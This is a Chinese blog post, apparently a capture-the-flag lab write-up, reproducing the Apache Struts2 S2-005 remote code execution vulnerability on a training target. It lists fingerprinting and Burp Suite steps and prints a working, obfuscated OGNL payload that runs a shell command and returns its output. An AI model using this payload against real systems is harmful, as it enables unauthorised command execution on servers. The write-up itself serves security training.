TypechoJoeTheme

mmzkyl

墨者学院靶场_Apache Struts2远程代码执行漏洞(S2-005)复现

mmzkyl博主
2021-11-11
/
0 评论
/
315 阅读
/
161 个字
/
百度已收录
11/11
本文最后更新于2021年11月11日,已超过236天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!

随笔

  • 2021-11-11 11:25
    可以通过访问如下路径判断是否为Struts2框架
    /struts/webconsole.html
  • 2021-11-11 21:34
    Struts2利用方式存在两种,一种有回显信息,一种无回显信息,此处仅记录有回显信息的利用方式

目标靶场



解题步骤

  • 又是熟悉的 .action 后缀
  • 先通过响应信息查看中间件信息
  • 还是老老实实跟着题目提示走,尝试寻找Struts2 S2-005的利用方式
  • 访问首页,然后使用burp suite抓包
  • 修改请求方式,将其改为POST请求方式
  • 将POC插入到请求正文即可
    redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27pwd%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}=
  • 漏洞成功执行,通过更改命令寻找目标Key提交即可
赞(1)
评论 (0)

互动读者

  • 在线博彩闲逛

    评论 4 次 | 文章 0 篇

  • Turkish citizenship by investment闲逛

    评论 1 次 | 文章 0 篇

  • หนัง18+闲逛

    评论 1 次 | 文章 0 篇

  • fafa slot 99闲逛

    评论 1 次 | 文章 0 篇

标签云